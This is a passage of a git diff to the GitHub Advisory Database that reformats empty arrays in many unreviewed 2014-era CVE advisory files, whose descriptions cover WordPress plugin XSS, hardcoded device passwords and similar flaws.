"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-h2mf-xvhf-xh95/GHSA-h2mf-xvhf-xh95.json b/advisories/unreviewed/2022/05/GHSA-h2mf-xvhf-xh95/GHSA-h2mf-xvhf-xh95.json
index 624f8fbe4ec..6baa3e6bc5e 100644
--- a/advisories/unreviewed/2022/05/GHSA-h2mf-xvhf-xh95/GHSA-h2mf-xvhf-xh95.json
+++ b/advisories/unreviewed/2022/05/GHSA-h2mf-xvhf-xh95/GHSA-h2mf-xvhf-xh95.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-h2qc-2x66-h864/GHSA-h2qc-2x66-h864.json b/advisories/unreviewed/2022/05/GHSA-h2qc-2x66-h864/GHSA-h2qc-2x66-h864.json
index ba1732d4997..acdddfd3831 100644
--- a/advisories/unreviewed/2022/05/GHSA-h2qc-2x66-h864/GHSA-h2qc-2x66-h864.json
+++ b/advisories/unreviewed/2022/05/GHSA-h2qc-2x66-h864/GHSA-h2qc-2x66-h864.json
@@ -7,12 +7,8 @@
"CVE-2014-4591"
],
"details": "Cross-site scripting (XSS) vulnerability in picasa_upload.php in the WP-Picasa-Image plugin 1.0 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the post_id parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-h3hf-hqw2-hx35/GHSA-h3hf-hqw2-hx35.json b/advisories/unreviewed/2022/05/GHSA-h3hf-hqw2-hx35/GHSA-h3hf-hqw2-hx35.json
index b7c2b66e31b..cd72d77414c 100644
--- a/advisories/unreviewed/2022/05/GHSA-h3hf-hqw2-hx35/GHSA-h3hf-hqw2-hx35.json
+++ b/advisories/unreviewed/2022/05/GHSA-h3hf-hqw2-hx35/GHSA-h3hf-hqw2-hx35.json
@@ -7,12 +7,8 @@
"CVE-2014-2969"
],
"details": "NETGEAR GS108PE Prosafe Plus switches with firmware 1.2.0.5 have a hardcoded password of debugpassword for the ntgruser account, which allows remote attackers to upload firmware or read or modify memory contents, and consequently execute arbitrary code, via a request to (1) produce_burn.cgi, (2) register_debug.cgi, or (3) bootcode_update.cgi.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-h544-387w-h4rm/GHSA-h544-387w-h4rm.json b/advisories/unreviewed/2022/05/GHSA-h544-387w-h4rm/GHSA-h544-387w-h4rm.json
index 5aea0be3973..11c26e3fa78 100644
--- a/advisories/unreviewed/2022/05/GHSA-h544-387w-h4rm/GHSA-h544-387w-h4rm.json
+++ b/advisories/unreviewed/2022/05/GHSA-h544-387w-h4rm/GHSA-h544-387w-h4rm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-h65h-fc6c-65hh/GHSA-h65h-fc6c-65hh.json b/advisories/unreviewed/2022/05/GHSA-h65h-fc6c-65hh/GHSA-h65h-fc6c-65hh.json
index fc9c0280f44..946cd033ad6 100644
--- a/advisories/unreviewed/2022/05/GHSA-h65h-fc6c-65hh/GHSA-h65h-fc6c-65hh.json
+++ b/advisories/unreviewed/2022/05/GHSA-h65h-fc6c-65hh/GHSA-h65h-fc6c-65hh.json
@@ -7,12 +7,8 @@
"CVE-2014-4547"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in templates/default/index_ajax.php in the Rezgo Online Booking plugin before 1.8.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) tags or (2) search_for parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-h765-v877-jmq3/GHSA-h765-v877-jmq3.json b/advisories/unreviewed/2022/05/GHSA-h765-v877-jmq3/GHSA-h765-v877-jmq3.json
index 4ed1f553f8f..e91ec299f61 100644
--- a/advisories/unreviewed/2022/05/GHSA-h765-v877-jmq3/GHSA-h765-v877-jmq3.json
+++ b/advisories/unreviewed/2022/05/GHSA-h765-v877-jmq3/GHSA-h765-v877-jmq3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-h7hj-mf8m-2h22/GHSA-h7hj-mf8m-2h22.json b/advisories/unreviewed/2022/05/GHSA-h7hj-mf8m-2h22/GHSA-h7hj-mf8m-2h22.json
index 89819f25377..cbb17b972d0 100644
--- a/advisories/unreviewed/2022/05/GHSA-h7hj-mf8m-2h22/GHSA-h7hj-mf8m-2h22.json
+++ b/advisories/unreviewed/2022/05/GHSA-h7hj-mf8m-2h22/GHSA-h7hj-mf8m-2h22.json
@@ -7,12 +7,8 @@
"CVE-2007-3970"
],
"details": "Race condition in ESET NOD32 Antivirus before 2.2289 allows remote attackers to execute arbitrary code via a crafted CAB file, which triggers heap corruption.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-h83v-45rc-pjvv/GHSA-h83v-45rc-pjvv.json b/advisories/unreviewed/2022/05/GHSA-h83v-45rc-pjvv/GHSA-h83v-45rc-pjvv.json
index 77ef907b876..355bec1f0a4 100644
--- a/advisories/unreviewed/2022/05/GHSA-h83v-45rc-pjvv/GHSA-h83v-45rc-pjvv.json
+++ b/advisories/unreviewed/2022/05/GHSA-h83v-45rc-pjvv/GHSA-h83v-45rc-pjvv.json
@@ -7,12 +7,8 @@
"CVE-2014-4716"
],
"details": "Cross-site request forgery (CSRF) vulnerability in Thomson TWG87OUIR allows remote attackers to hijack the authentication of unspecified victims for requests that change passwords via the Password and PasswordReEnter parameters to goform/RgSecurity.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-h8mp-p8xw-22g5/GHSA-h8mp-p8xw-22g5.json b/advisories/unreviewed/2022/05/GHSA-h8mp-p8xw-22g5/GHSA-h8mp-p8xw-22g5.json
index 979a295b318..766db91c851 100644
--- a/advisories/unreviewed/2022/05/GHSA-h8mp-p8xw-22g5/GHSA-h8mp-p8xw-22g5.json
+++ b/advisories/unreviewed/2022/05/GHSA-h8mp-p8xw-22g5/GHSA-h8mp-p8xw-22g5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-h93p-gqrw-mxv8/GHSA-h93p-gqrw-mxv8.json b/advisories/unreviewed/2022/05/GHSA-h93p-gqrw-mxv8/GHSA-h93p-gqrw-mxv8.json
index a4a7e6517bb..08953519a3c 100644
--- a/advisories/unreviewed/2022/05/GHSA-h93p-gqrw-mxv8/GHSA-h93p-gqrw-mxv8.json
+++ b/advisories/unreviewed/2022/05/GHSA-h93p-gqrw-mxv8/GHSA-h93p-gqrw-mxv8.json
@@ -7,12 +7,8 @@
"CVE-2014-4582"
],
"details": "Cross-site scripting (XSS) vulnerability in admin/admin_show_dialogs.php in the WP Consultant plugin 1.0 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the dialog_id parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-h9xp-vxpc-w625/GHSA-h9xp-vxpc-w625.json b/advisories/unreviewed/2022/05/GHSA-h9xp-vxpc-w625/GHSA-h9xp-vxpc-w625.json
index e8f81a60faa..ffa0e27d3db 100644
--- a/advisories/unreviewed/2022/05/GHSA-h9xp-vxpc-w625/GHSA-h9xp-vxpc-w625.json
+++ b/advisories/unreviewed/2022/05/GHSA-h9xp-vxpc-w625/GHSA-h9xp-vxpc-w625.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-hcff-5hq7-x4xp/GHSA-hcff-5hq7-x4xp.json b/advisories/unreviewed/2022/05/GHSA-hcff-5hq7-x4xp/GHSA-hcff-5hq7-x4xp.json
index 21abc815bd0..101f9a49d2f 100644
--- a/advisories/unreviewed/2022/05/GHSA-hcff-5hq7-x4xp/GHSA-hcff-5hq7-x4xp.json
+++ b/advisories/unreviewed/2022/05/GHSA-hcff-5hq7-x4xp/GHSA-hcff-5hq7-x4xp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-hfr6-pxvf-frf7/GHSA-hfr6-pxvf-frf7.json b/advisories/unreviewed/2022/05/GHSA-hfr6-pxvf-frf7/GHSA-hfr6-pxvf-frf7.json
index 4c7f583663f..c9006d27dc9 100644
--- a/advisories/unreviewed/2022/05/GHSA-hfr6-pxvf-frf7/GHSA-hfr6-pxvf-frf7.json
+++ b/advisories/unreviewed/2022/05/GHSA-hfr6-pxvf-frf7/GHSA-hfr6-pxvf-frf7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-hfw9-cf9w-2g5w/GHSA-hfw9-cf9w-2g5w.json b/advisories/unreviewed/2022/05/GHSA-hfw9-cf9w-2g5w/GHSA-hfw9-cf9w-2g5w.json
index 91ca1362ea6..3266dee8bca 100644
--- a/advisories/unreviewed/2022/05/GHSA-hfw9-cf9w-2g5w/GHSA-hfw9-cf9w-2g5w.json
+++ b/advisories/unreviewed/2022/05/GHSA-hfw9-cf9w-2g5w/GHSA-hfw9-cf9w-2g5w.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-hj9m-crm5-8427/GHSA-hj9m-crm5-8427.json b/advisories/unreviewed/2022/05/GHSA-hj9m-crm5-8427/GHSA-hj9m-crm5-8427.json
index dc6d6aea418..c41017751c0 100644
--- a/advisories/unreviewed/2022/05/GHSA-hj9m-crm5-8427/GHSA-hj9m-crm5-8427.json
+++ b/advisories/unreviewed/2022/05/GHSA-hj9m-crm5-8427/GHSA-hj9m-crm5-8427.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-hm77-hg92-mp58/GHSA-hm77-hg92-mp58.json b/advisories/unreviewed/2022/05/GHSA-hm77-hg92-mp58/GHSA-hm77-hg92-mp58.json
index fc2bc7fdadd..4bb2475b4ea 100644
--- a/advisories/unreviewed/2022/05/GHSA-hm77-hg92-mp58/GHSA-hm77-hg92-mp58.json
+++ b/advisories/unreviewed/2022/05/GHSA-hm77-hg92-mp58/GHSA-hm77-hg92-mp58.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-hmmr-427f-cr3p/GHSA-hmmr-427f-cr3p.json b/advisories/unreviewed/2022/05/GHSA-hmmr-427f-cr3p/GHSA-hmmr-427f-cr3p.json
index 67bc3c3accc..29d7be7a36a 100644
--- a/advisories/unreviewed/2022/05/GHSA-hmmr-427f-cr3p/GHSA-hmmr-427f-cr3p.json
+++ b/advisories/unreviewed/2022/05/GHSA-hmmr-427f-cr3p/GHSA-hmmr-427f-cr3p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-hqqh-cqxq-wqr6/GHSA-hqqh-cqxq-wqr6.json b/advisories/unreviewed/2022/05/GHSA-hqqh-cqxq-wqr6/GHSA-hqqh-cqxq-wqr6.json
index 41405362052..6bf1759d0fd 100644
--- a/advisories/unreviewed/2022/05/GHSA-hqqh-cqxq-wqr6/GHSA-hqqh-cqxq-wqr6.json
+++ b/advisories/unreviewed/2022/05/GHSA-hqqh-cqxq-wqr6/GHSA-hqqh-cqxq-wqr6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-hqrm-74p3-w275/GHSA-hqrm-74p3-w275.json b/advisories/unreviewed/2022/05/GHSA-hqrm-74p3-w275/GHSA-hqrm-74p3-w275.json
index 8b37f5f72fa..14ada8a2513 100644
--- a/advisories/unreviewed/2022/05/GHSA-hqrm-74p3-w275/GHSA-hqrm-74p3-w275.json
+++ b/advisories/unreviewed/2022/05/GHSA-hqrm-74p3-w275/GHSA-hqrm-74p3-w275.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-hr4m-jq9r-c4gx/GHSA-hr4m-jq9r-c4gx.json b/advisories/unreviewed/2022/05/GHSA-hr4m-jq9r-c4gx/GHSA-hr4m-jq9r-c4gx.json
index 12582d38d94..236d6263039 100644
--- a/advisories/unreviewed/2022/05/GHSA-hr4m-jq9r-c4gx/GHSA-hr4m-jq9r-c4gx.json
+++ b/advisories/unreviewed/2022/05/GHSA-hr4m-jq9r-c4gx/GHSA-hr4m-jq9r-c4gx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-hrf8-94cp-x6x2/GHSA-hrf8-94cp-x6x2.json b/advisories/unreviewed/2022/05/GHSA-hrf8-94cp-x6x2/GHSA-hrf8-94cp-x6x2.json
index 8e401e8bbd5..247e167f6f3 100644
--- a/advisories/unreviewed/2022/05/GHSA-hrf8-94cp-x6x2/GHSA-hrf8-94cp-x6x2.json
+++ b/advisories/unreviewed/2022/05/GHSA-hrf8-94cp-x6x2/GHSA-hrf8-94cp-x6x2.json
@@ -7,12 +7,8 @@
"CVE-2014-4942"
],
"details": "The EasyCart (wp-easycart) plugin before 2.0.6 for WordPress allows remote attackers to obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-hvhw-h5rv-3fff/GHSA-hvhw-h5rv-3fff.json b/advisories/unreviewed/2022/05/GHSA-hvhw-h5rv-3fff/GHSA-hvhw-h5rv-3fff.json
index 9c577c1df2a..48cacae9fdd 100644
--- a/advisories/unreviewed/2022/05/GHSA-hvhw-h5rv-3fff/GHSA-hvhw-h5rv-3fff.json
+++ b/advisories/unreviewed/2022/05/GHSA-hvhw-h5rv-3fff/GHSA-hvhw-h5rv-3fff.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-hvjx-fghp-fwxj/GHSA-hvjx-fghp-fwxj.json b/advisories/unreviewed/2022/05/GHSA-hvjx-fghp-fwxj/GHSA-hvjx-fghp-fwxj.json
index c733d7ace82..6e8da279eff 100644
--- a/advisories/unreviewed/2022/05/GHSA-hvjx-fghp-fwxj/GHSA-hvjx-fghp-fwxj.json
+++ b/advisories/unreviewed/2022/05/GHSA-hvjx-fghp-fwxj/GHSA-hvjx-fghp-fwxj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-hw7f-w767-vqpp/GHSA-hw7f-w767-vqpp.json b/advisories/unreviewed/2022/05/GHSA-hw7f-w767-vqpp/GHSA-hw7f-w767-vqpp.json
index 4b5601b1fea..cb8b48c3328 100644
--- a/advisories/unreviewed/2022/05/GHSA-hw7f-w767-vqpp/GHSA-hw7f-w767-vqpp.json
+++ b/advisories/unreviewed/2022/05/GHSA-hw7f-w767-vqpp/GHSA-hw7f-w767-vqpp.json
@@ -7,12 +7,8 @@
"CVE-2014-5019"
],
"details": "The multisite feature in Drupal 6.x before 6.32 and 7.x before 7.29 allows remote attackers to cause a denial of service via a crafted HTTP Host header, related to determining which configuration file to use.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-hwjw-3f5p-hghg/GHSA-hwjw-3f5p-hghg.json b/advisories/unreviewed/2022/05/GHSA-hwjw-3f5p-hghg/GHSA-hwjw-3f5p-hghg.json
index 9cf046b2905..cc80b55ed96 100644
--- a/advisories/unreviewed/2022/05/GHSA-hwjw-3f5p-hghg/GHSA-hwjw-3f5p-hghg.json
+++ b/advisories/unreviewed/2022/05/GHSA-hwjw-3f5p-hghg/GHSA-hwjw-3f5p-hghg.json
@@ -7,12 +7,8 @@
"CVE-2014-4601"
],
"details": "Cross-site scripting (XSS) vulnerability in wu-ratepost.php in the Wu-Rating plugin 1.0 12319 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the v parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-j29m-jffx-jf53/GHSA-j29m-jffx-jf53.json b/advisories/unreviewed/2022/05/GHSA-j29m-jffx-jf53/GHSA-j29m-jffx-jf53.json
index 4e3198900ae..8d4862c1e5f 100644
--- a/advisories/unreviewed/2022/05/GHSA-j29m-jffx-jf53/GHSA-j29m-jffx-jf53.json
+++ b/advisories/unreviewed/2022/05/GHSA-j29m-jffx-jf53/GHSA-j29m-jffx-jf53.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-j4mw-h6w4-xh6g/GHSA-j4mw-h6w4-xh6g.json b/advisories/unreviewed/2022/05/GHSA-j4mw-h6w4-xh6g/GHSA-j4mw-h6w4-xh6g.json
index 74a71ea024e..833281089dc 100644
--- a/advisories/unreviewed/2022/05/GHSA-j4mw-h6w4-xh6g/GHSA-j4mw-h6w4-xh6g.json
+++ b/advisories/unreviewed/2022/05/GHSA-j4mw-h6w4-xh6g/GHSA-j4mw-h6w4-xh6g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-j7c9-v542-pqfh/GHSA-j7c9-v542-pqfh.json b/advisories/unreviewed/2022/05/GHSA-j7c9-v542-pqfh/GHSA-j7c9-v542-pqfh.json
index 474b0256138..a2279147bbd 100644
--- a/advisories/unreviewed/2022/05/GHSA-j7c9-v542-pqfh/GHSA-j7c9-v542-pqfh.json
+++ b/advisories/unreviewed/2022/05/GHSA-j7c9-v542-pqfh/GHSA-j7c9-v542-pqfh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-j7g7-882g-c9vp/GHSA-j7g7-882g-c9vp.json b/advisories/unreviewed/2022/05/GHSA-j7g7-882g-c9vp/GHSA-j7g7-882g-c9vp.json
index dcb61a1262d..57f8f579dbf 100644
--- a/advisories/unreviewed/2022/05/GHSA-j7g7-882g-c9vp/GHSA-j7g7-882g-c9vp.json
+++ b/advisories/unreviewed/2022/05/GHSA-j7g7-882g-c9vp/GHSA-j7g7-882g-c9vp.json
@@ -7,12 +7,8 @@
"CVE-2014-4945"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in Horde Internet Mail Program (IMP) before 6.1.8, as used in Horde Groupware Webmail Edition before 5.1.5, allow remote attackers to inject arbitrary web script or HTML via an unspecified flag in the basic (1) mailbox or (2) message view.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-j7x3-25rm-f77v/GHSA-j7x3-25rm-f77v.json b/advisories/unreviewed/2022/05/GHSA-j7x3-25rm-f77v/GHSA-j7x3-25rm-f77v.json
index 9e57173d726..5754f96ecfc 100644
--- a/advisories/unreviewed/2022/05/GHSA-j7x3-25rm-f77v/GHSA-j7x3-25rm-f77v.json
+++ b/advisories/unreviewed/2022/05/GHSA-j7x3-25rm-f77v/GHSA-j7x3-25rm-f77v.json
@@ -7,12 +7,8 @@
"CVE-2014-4527"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in paginas/vista-previa-form.php in the EnvialoSimple: Email Marketing and Newsletters (envialosimple-email-marketing-y-newsletters-gratis) plugin before 1.98 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) FormID or (2) AdministratorID parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-j84j-6h2f-jqj3/GHSA-j84j-6h2f-jqj3.json b/advisories/unreviewed/2022/05/GHSA-j84j-6h2f-jqj3/GHSA-j84j-6h2f-jqj3.json
index 2c405e46fc2..4b31be5739e 100644
--- a/advisories/unreviewed/2022/05/GHSA-j84j-6h2f-jqj3/GHSA-j84j-6h2f-jqj3.json
+++ b/advisories/unreviewed/2022/05/GHSA-j84j-6h2f-jqj3/GHSA-j84j-6h2f-jqj3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-j84v-36m7-v338/GHSA-j84v-36m7-v338.json b/advisories/unreviewed/2022/05/GHSA-j84v-36m7-v338/GHSA-j84v-36m7-v338.json
index 560908c8fda..ed959345b82 100644
--- a/advisories/unreviewed/2022/05/GHSA-j84v-36m7-v338/GHSA-j84v-36m7-v338.json
+++ b/advisories/unreviewed/2022/05/GHSA-j84v-36m7-v338/GHSA-j84v-36m7-v338.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-j8m9-79v9-f73v/GHSA-j8m9-79v9-f73v.json b/advisories/unreviewed/2022/05/GHSA-j8m9-79v9-f73v/GHSA-j8m9-79v9-f73v.json
index 4999bb7501c..37bf2966c94 100644
--- a/advisories/unreviewed/2022/05/GHSA-j8m9-79v9-f73v/GHSA-j8m9-79v9-f73v.json
+++ b/advisories/unreviewed/2022/05/GHSA-j8m9-79v9-f73v/GHSA-j8m9-79v9-f73v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-j9xf-76vv-4wcg/GHSA-j9xf-76vv-4wcg.json b/advisories/unreviewed/2022/05/GHSA-j9xf-76vv-4wcg/GHSA-j9xf-76vv-4wcg.json
index 0c02eba04bf..d9e22179fdf 100644
--- a/advisories/unreviewed/2022/05/GHSA-j9xf-76vv-4wcg/GHSA-j9xf-76vv-4wcg.json
+++ b/advisories/unreviewed/2022/05/GHSA-j9xf-76vv-4wcg/GHSA-j9xf-76vv-4wcg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-jcp3-xfrr-gf86/GHSA-jcp3-xfrr-gf86.json b/advisories/unreviewed/2022/05/GHSA-jcp3-xfrr-gf86/GHSA-jcp3-xfrr-gf86.json
index 56ce59d78e5..6d844fb7d36 100644
--- a/advisories/unreviewed/2022/05/GHSA-jcp3-xfrr-gf86/GHSA-jcp3-xfrr-gf86.json
+++ b/advisories/unreviewed/2022/05/GHSA-jcp3-xfrr-gf86/GHSA-jcp3-xfrr-gf86.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-jf73-g393-6jw9/GHSA-jf73-g393-6jw9.json b/advisories/unreviewed/2022/05/GHSA-jf73-g393-6jw9/GHSA-jf73-g393-6jw9.json
index d4f2de19135..53c436e71ee 100644
--- a/advisories/unreviewed/2022/05/GHSA-jf73-g393-6jw9/GHSA-jf73-g393-6jw9.json
+++ b/advisories/unreviewed/2022/05/GHSA-jf73-g393-6jw9/GHSA-jf73-g393-6jw9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-jgjf-3j97-4v75/GHSA-jgjf-3j97-4v75.json b/advisories/unreviewed/2022/05/GHSA-jgjf-3j97-4v75/GHSA-jgjf-3j97-4v75.json
index a35d8fd2516..7bc282e47b7 100644
--- a/advisories/unreviewed/2022/05/GHSA-jgjf-3j97-4v75/GHSA-jgjf-3j97-4v75.json
+++ b/advisories/unreviewed/2022/05/GHSA-jgjf-3j97-4v75/GHSA-jgjf-3j97-4v75.json
@@ -7,12 +7,8 @@
"CVE-2014-2951"
],
"details": "Datum Systems SnIP on PSM-500 and PSM-4500 devices has a hardcoded password of admin for the admin account, which makes it easier for remote attackers to obtain access via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
